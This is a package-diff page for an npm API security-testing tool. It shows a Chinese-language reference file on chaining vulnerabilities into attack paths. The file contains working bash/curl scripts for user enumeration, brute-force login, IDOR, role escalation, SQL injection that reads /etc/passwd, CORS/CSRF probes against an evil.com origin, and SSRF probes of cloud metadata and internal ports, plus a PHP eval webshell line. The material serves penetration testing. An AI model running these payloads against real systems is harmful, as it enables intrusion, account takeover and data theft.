npm - opencode-api-security-testing - Versions diffs - 3.0.10 → 3.0.11 - Mend

opencode-api-security-testing 3.0.10 → 3.0.11

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (71) hide show

package/README.md +74 -0
package/SKILL.md +1797 -0
package/core/advanced_recon.py +788 -0
package/core/agentic_analyzer.py +445 -0
package/core/analyzers/api_parser.py +210 -0
package/core/analyzers/response_analyzer.py +212 -0
package/core/analyzers/sensitive_finder.py +184 -0
package/core/api_fuzzer.py +422 -0
package/core/api_interceptor.py +525 -0
package/core/api_parser.py +955 -0
package/core/browser_tester.py +479 -0
package/core/cloud_storage_tester.py +1330 -0
package/core/collectors/__init__.py +23 -0
package/core/collectors/api_path_finder.py +300 -0
package/core/collectors/browser_collect.py +645 -0
package/core/collectors/browser_collector.py +411 -0
package/core/collectors/http_client.py +111 -0
package/core/collectors/js_collector.py +490 -0
package/core/collectors/js_parser.py +780 -0
package/core/collectors/url_collector.py +319 -0
package/core/context_manager.py +682 -0
package/core/deep_api_tester_v35.py +844 -0
package/core/deep_api_tester_v55.py +366 -0
package/core/dynamic_api_analyzer.py +532 -0
package/core/http_client.py +179 -0
package/core/models.py +296 -0
package/core/orchestrator.py +890 -0
package/core/prerequisite.py +227 -0
package/core/reasoning_engine.py +1042 -0
package/core/response_classifier.py +606 -0
package/core/runner.py +938 -0
package/core/scan_engine.py +599 -0
package/core/skill_executor.py +435 -0
package/core/skill_executor_v2.py +670 -0
package/core/skill_executor_v3.py +704 -0
package/core/smart_analyzer.py +687 -0
package/core/strategy_pool.py +707 -0
package/core/testers/auth_tester.py +264 -0
package/core/testers/idor_tester.py +200 -0
package/core/testers/sqli_tester.py +211 -0
package/core/testing_loop.py +655 -0
package/core/utils/base_path_dict.py +255 -0
package/core/utils/payload_lib.py +167 -0
package/core/utils/ssrf_detector.py +220 -0
package/core/verifiers/vuln_verifier.py +536 -0
package/package.json +1 -1
package/references/README.md +72 -0
package/references/asset-discovery.md +119 -0
package/references/fuzzing-patterns.md +129 -0
package/references/graphql-guidance.md +108 -0
package/references/intake.md +84 -0
package/references/pua-agent.md +192 -0
package/references/report-template.md +156 -0
package/references/rest-guidance.md +76 -0
package/references/severity-model.md +76 -0
package/references/test-matrix.md +86 -0
package/references/validation.md +78 -0
package/references/vulnerabilities/01-sqli-tests.md +1128 -0
package/references/vulnerabilities/02-user-enum-tests.md +423 -0
package/references/vulnerabilities/03-jwt-tests.md +499 -0
package/references/vulnerabilities/04-idor-tests.md +362 -0
package/references/vulnerabilities/05-sensitive-data-tests.md +466 -0
package/references/vulnerabilities/06-biz-logic-tests.md +501 -0
package/references/vulnerabilities/07-security-config-tests.md +511 -0
package/references/vulnerabilities/08-brute-force-tests.md +457 -0
package/references/vulnerabilities/09-vulnerability-chains.md +465 -0
package/references/vulnerabilities/10-auth-tests.md +537 -0
package/references/vulnerabilities/11-graphql-tests.md +355 -0
package/references/vulnerabilities/12-ssrf-tests.md +396 -0
package/references/vulnerabilities/README.md +148 -0
package/references/workflows.md +192 -0

package/references/vulnerabilities/09-vulnerability-chains.md ADDED Viewed

@@ -0,0 +1,465 @@
+# 漏洞关联联想
+## 1. 概述
+漏洞关联联想是指当发现一个漏洞时，思考该漏洞能串联哪些其他漏洞，形成攻击链。
+## 2. 漏洞关联矩阵
+| 发现的漏洞 | 可能关联的漏洞 | 利用路径 |
+|-----------|---------------|----------|
+| 用户枚举 | 暴力破解、密码重置 | 确认用户 → 定向爆破/重置 |
+| SQL注入 | 认证绕过、数据泄露 | 获取数据 → 横向移动 |
+| JWT泄露 | 越权、敏感数据 | 使用Token → 访问他人数据 |
+| IDOR | 敏感数据、垂直越权 | 遍历ID → 获取数据/提权 |
+| 文件上传 | 远程代码执行 | 上传Webshell → 服务器沦陷 |
+| SSRF | 内网渗透 | 内网探测 → Redis/MySQL利用 |
+| CORS | CSRF、数据窃取 | 跨域请求 → 窃取数据 |
+| 暴力破解 | 账户接管 | 破解密码 → 登录系统 |
+## 3. 攻击链模板
+### 3.1 信息收集 → 利用链
+```
+信息收集类漏洞（低难度）
+    ↓
+利用类漏洞（中高难度）
+    ↓
+数据获取/权限提升
+    ↓
+持久化/横向移动
+```
+### 3.2 典型攻击链
+```markdown
+攻击链1：用户枚举 → 暴力破解 → 越权
+├── 1. 用户枚举
+│   GET /sys/user/checkOnlyUser?username=admin
+│   → 确认 admin 存在
+├── 2. 暴力破解
+│   POST /api/login {"username":"admin","password":"admin123"}
+│   → 登录成功，获取 token
+└── 3. 越权操作
+    GET /api/user/info?userId=2
+    Headers: {"Authorization": "Bearer xxx"}
+    → 越权访问他人数据
+攻击链2：IDOR → 数据泄露 → 垂直越权
+├── 1. IDOR
+│   GET /api/order?orderId=100
+│   → 可遍历获取他人订单
+├── 2. 数据分析
+│   → 发现订单中有 userId 字段
+└── 3. 垂直越权
+    POST /api/user/role {"userId": 100, "role": "admin"}
+    → 提升为管理员
+攻击链3：SQL注入 → 文件读取 → 密钥泄露
+├── 1. SQL注入
+│   GET /api/user?id=1' AND SLEEP(5)--
+│   → 时间盲注确认注入
+├── 2. 文件读取
+│   GET /api/user?id=1' UNION SELECT 1,LOAD_FILE('/etc/passwd')--
+│   → 获取系统用户
+└── 3. SSH登录
+    ssh admin@server
+    → 服务器沦陷
+```
+## 4. 漏洞优先级排序
+### 4.1 按利用难易度
+| 优先级 | 漏洞类型 | 利用难度 | 说明 |
+|--------|----------|----------|------|
+| 1 | 用户枚举 | 低 | 直接请求即可确认 |
+| 2 | IDOR | 低 | 修改参数值 |
+| 3 | 敏感信息泄露 | 低 | 查看响应 |
+| 4 | 暴力破解 | 中 | 需要多次请求 |
+| 5 | JWT伪造 | 中 | 需要算法理解 |
+| 6 | SQL注入 | 中 | 需要一定技巧 |
+| 7 | 垂直越权 | 中 | 需要权限理解 |
+| 8 | 命令注入 | 高 | 需要环境配合 |
+### 4.2 按影响程度
+| 影响 | 漏洞类型 | 后果 |
+|------|----------|------|
+| 严重 | 命令注入 | 服务器完全沦陷 |
+| 严重 | SQL注入 | 数据库拖库 |
+| 严重 | 垂直越权 | 获取管理员权限 |
+| 高 | 账户接管 | 冒充用户 |
+| 高 | 敏感数据泄露 | 数据外泄 |
+| 中 | 水平越权 | 他人数据访问 |
+| 中 | CSRF | 用户操作被伪造 |
+| 低 | 信息收集 | 辅助攻击 |
+## 5. 单漏洞深度联想
+### 5.1 发现 SQL 注入后
+```
+SQL注入
+    ↓
+┌─────────────────────────────────────┐
+│ 1. 认证绕过                           │
+│    ' OR '1'='1 绕过登录              │
+└─────────────────────────────────────┘
+    ↓
+┌─────────────────────────────────────┐
+│ 2. 数据获取                           │
+│    UNION SELECT 获取用户表            │
+│    → 邮箱、手机号、密码Hash            │
+└─────────────────────────────────────┘
+    ↓
+┌─────────────────────────────────────┐
+│ 3. 密码破解                           │
+│    Hash → 明文（如果弱Hash）          │
+└─────────────────────────────────────┘
+    ↓
+┌─────────────────────────────────────┐
+│ 4. 横向移动                           │
+│    使用破解的密码尝试其他系统           │
+└─────────────────────────────────────┘
+```
+### 5.2 发现 JWT Token 后
+```
+JWT Token
+    ↓
+┌─────────────────────────────────────┐
+│ 1. Token 有效性验证                   │
+│    使用 Token 访问其他接口            │
+└─────────────────────────────────────┘
+    ↓
+┌─────────────────────────────────────┐
+│ 2. 权限提升                           │
+│    篡改 payload 中的 role/userId      │
+│    → 伪造 admin/提升权限             │
+└─────────────────────────────────────┘
+    ↓
+┌─────────────────────────────────────┐
+│ 3. 敏感操作                           │
+│    修改密码、删除数据、管理功能        │
+└─────────────────────────────────────┘
+```
+### 5.3 发现文件上传后
+```
+文件上传漏洞
+    ↓
+┌─────────────────────────────────────┐
+│ 1. 上传Webshell                       │
+│    <?php @eval($_POST['cmd']); ?>    │
+└─────────────────────────────────────┘
+    ↓
+┌─────────────────────────────────────┐
+│ 2. 获取webshell                       │
+│    访问上传的文件路径                 │
+└─────────────────────────────────────┘
+    ↓
+┌─────────────────────────────────────┐
+│ 3. 服务器接管                         │
+│    执行命令、读取配置文件、横向移动    │
+└─────────────────────────────────────┘
+```
+## 6. 漏洞组合利用
+### 6.1 社工+技术组合
+```markdown
+1. 用户枚举
+   → 确认 admin, test, developer 存在
+2. LinkedIn 社工
+   → 收集这些用户的公司、职位信息
+3. 生成社工密码
+   → Company123!, Test@2024, Dev@2024
+4. 暴力破解
+   → 使用社工密码提高成功率
+```
+### 6.2 信息泄露+越权组合
+```markdown
+1. Swagger 文档泄露
+   → 发现 /api/user/{id}/modify 接口
+2. IDOR
+   → 修改 id 参数遍历
+3. 结合
+   → 遍历修改所有用户信息
+```
+## 7. 测试检查清单
+```
+□ 发现漏洞后立即思考关联
+□ 绘制攻击链路径
+□ 评估每个环节的可行性
+□ 检查漏洞优先级
+□ 验证关联漏洞
+□ 输出完整攻击链报告
+```
+## 8. 漏洞关联快速查询表
+| 发现的漏洞 | 第一步 | 第二步 | 最终目标 |
+|------------|--------|--------|----------|
+| 用户枚举 | 确认用户 | 暴力破解 | 账户接管 |
+| SQL注入 | 获取数据 | 密码破解 | 横向移动 |
+| JWT | 验证Token | 权限提升 | 管理员 |
+| IDOR | 遍历ID | 数据分析 | 批量获取 |
+| SSRF | 内网探测 | 服务利用 | 内网沦陷 |
+| CORS | 窃取数据 | 社工攻击 | 账号接管 |
+| 上传 | Webshell | 命令执行 | 服务器 |
+## 9. curl验证示例
+### 9.1 攻击链1：用户枚举 → 暴力破解 → 越权
+```bash
+#!/bin/bash
+# 攻击链验证脚本
+TARGET="http://api"
+USERNAME="admin"
+echo "=== 攻击链1：用户枚举 → 暴力破解 → 越权 ==="
+# Step 1: 用户枚举
+echo "[1] 用户枚举测试"
+curl -s -X POST "$TARGET/login" \
+     -H "Content-Type: application/json" \
+     -d "{\"username\":\"$USERNAME\",\"password\":\"wrong\"}" > step1_enum.json
+if grep -q "密码错误" step1_enum.json; then
+    echo "  → 用户 $USERNAME 存在（密码错误）"
+elif grep -q "不存在" step1_enum.json; then
+    echo "  → 用户 $USERNAME 不存在"
+    exit 1
+fi
+# Step 2: 暴力破解
+echo "[2] 暴力破解测试"
+PASSWORDS=("123456" "admin" "admin123" "password" "qwerty")
+SUCCESS=false
+for pwd in "${PASSWORDS[@]}"; do
+    RESP=$(curl -s -X POST "$TARGET/login" \
+        -H "Content-Type: application/json" \
+        -d "{\"username\":\"$USERNAME\",\"password\":\"$pwd\"}")
+    if echo "$RESP" | grep -q '"token"'; then
+        echo "  → 密码破解成功: $pwd"
+        TOKEN=$(echo "$RESP" | jq -r '.token')
+        SUCCESS=true
+        break
+    fi
+done
+if [ "$SUCCESS" = false ]; then
+    echo "  → 密码破解失败"
+    exit 1
+fi
+# Step 3: 越权操作
+echo "[3] 越权测试"
+curl -s -X GET "$TARGET/user/info?userId=2" \
+     -H "Authorization: Bearer $TOKEN" > step3_idor.json
+if grep -q "userId" step3_idor.json && ! grep -q "无权限" step3_idor.json; then
+    echo "  → 越权成功：访问了 userId=2 的数据"
+    cat step3_idor.json | jq .
+else
+    echo "  → 越权失败：无法访问他人数据"
+fi
+echo ""
+echo "=== 攻击链验证完成 ==="
+```
+### 9.2 攻击链2：IDOR → 数据泄露 → 垂直越权
+```bash
+#!/bin/bash
+# 攻击链验证脚本
+TARGET="http://api"
+TOKEN="user_token_here"
+echo "=== 攻击链2：IDOR → 数据泄露 → 垂直越权 ==="
+# Step 1: IDOR测试
+echo "[1] IDOR测试 - 遍历订单"
+for order_id in 100 101 102 103 104; do
+    RESP=$(curl -s -X GET "$TARGET/order?orderId=$order_id" \
+        -H "Authorization: Bearer $TOKEN")
+    if echo "$RESP" | grep -q '"orderId"'; then
+        echo "  → orderId=$order_id: 可访问"
+        echo "$RESP" | jq .
+    fi
+done
+# Step 2: 数据分析
+echo "[2] 分析订单数据"
+echo "  → 发现订单中包含 userId 字段"
+# Step 3: 垂直越权
+echo "[3] 垂直越权测试 - 修改角色"
+curl -s -X POST "$TARGET/user/role" \
+     -H "Authorization: Bearer $TOKEN" \
+     -H "Content-Type: application/json" \
+     -d '{"userId": 2, "role": "admin"}' > step3_privesc.json
+if grep -q '"success":true' step3_privesc.json; then
+    echo "  → 垂直越权成功：已将 userId=2 提升为admin"
+    cat step3_privesc.json | jq .
+else
+    echo "  → 垂直越权失败"
+fi
+echo ""
+echo "=== 攻击链验证完成 ==="
+```
+### 9.3 攻击链3：SQL注入 → 数据获取 → 密码破解
+```bash
+#!/bin/bash
+# 攻击链验证脚本
+TARGET="http://api"
+echo "=== 攻击链3：SQL注入 → 数据获取 → 密码破解 ==="
+# Step 1: SQL注入测试
+echo "[1] SQL注入测试"
+PAYLOAD="' OR '1'='1"
+RESP=$(curl -s -X GET "$TARGET/user?id=1$PAYLOAD" \
+    -H "Content-Type: application/json")
+if echo "$RESP" | grep -qiE "sql|mysql|oracle|error|syntax"; then
+    echo "  → 发现SQL错误，可能存在注入"
+    echo "$RESP" | head -c 200
+else
+    echo "  → 未发现SQL错误"
+fi
+# Step 2: UNION注入获取数据
+echo "[2] UNION注入获取用户数据"
+PAYLOAD="' UNION SELECT 1,2,username,password,5,6,7 FROM users--"
+RESP=$(curl -s -X GET "$TARGET/user?id=1 $PAYLOAD")
+if echo "$RESP" | grep -q "admin\|root\|user"; then
+    echo "  → UNION注入成功，获取到用户名"
+fi
+# Step 3: 分析密码Hash
+echo "[3] 分析密码Hash"
+echo "  → 发现密码Hash，可尝试离线破解"
+echo ""
+echo "=== 攻击链验证完成 ==="
+```
+### 9.4 攻击链4：CORS → CSRF → 会话窃取
+```bash
+#!/bin/bash
+# 攻击链验证脚本
+TARGET="http://api"
+echo "=== 攻击链4：CORS → CSRF → 会话窃取 ==="
+# Step 1: CORS配置测试
+echo "[1] CORS配置测试"
+curl -s -I -H "Origin: https://evil.com" \
+     "$TARGET/user/info" > cors_headers.txt
+ACAO=$(grep -i "Access-Control-Allow-Origin:" cors_headers.txt)
+ACAC=$(grep -i "Access-Control-Allow-Credentials:" cors_headers.txt)
+echo "  → $ACAO"
+echo "  → $ACAC"
+if echo "$ACAO" | grep -q "\*"; then
+    if echo "$ACAC" | grep -q "true"; then
+        echo "  → [严重] ACAO:* + ACAC:true，可配合CSRF窃取数据"
+    else
+        echo "  → [中危] ACAO:* 但无ACAC"
+    fi
+fi
+# Step 2: CSRF测试
+echo "[2] CSRF测试"
+curl -s -X POST "$TARGET/user/update" \
+     -H "Origin: https://evil.com" \
+     -H "Content-Type: application/json" \
+     -d '{"userId": 1, "email": "hacked@evil.com"}' > csrf_test.json
+if grep -q "success" csrf_test.json; then
+    echo "  → CSRF攻击可能成功"
+else
+    echo "  → CSRF防护可能生效"
+fi
+echo ""
+echo "=== 攻击链验证完成 ==="
+```
+### 9.5 攻击链5：SSRF → 内网探测 → 服务利用
+```bash
+#!/bin/bash
+# 攻击链验证脚本
+TARGET="http://api"
+echo "=== 攻击链5：SSRF → 内网探测 → 服务利用 ==="
+# Step 1: SSRF测试
+echo "[1] SSRF测试"
+PAYLOADS=(
+    "http://127.0.0.1"
+    "http://localhost"
+    "http://169.254.169.254"
+    "http://192.168.1.1"
+)
+for payload in "${PAYLOADS[@]}"; do
+    RESP=$(curl -s -X GET "$TARGET/fetch?url=$payload")
+    if echo "$RESP" | grep -qiE "root:|apache|nginx|mysql|redis"; then
+        echo "  → SSRF成功: $payload"
+        echo "$RESP" | head -c 300
+    elif echo "$RESP" | grep -qi "connection\|refused\|timeout"; then
+        echo "  → $payload: 连接被拒绝（可能有防护）"
+    else
+        echo "  → $payload: 无明显响应"
+    fi
+done
+# Step 2: 内网端口探测
+echo "[2] 内网端口探测"
+for port in 80 443 3306 6379 8080; do
+    RESP=$(curl -s -m 3 -X GET "$TARGET/fetch?url=http://127.0.0.1:$port")
+    if [ $? -eq 0 ]; then
+        echo "  → 端口 $port: 开放"
+    fi
+done
+echo ""
+echo "=== 攻击链验证完成 ==="
+```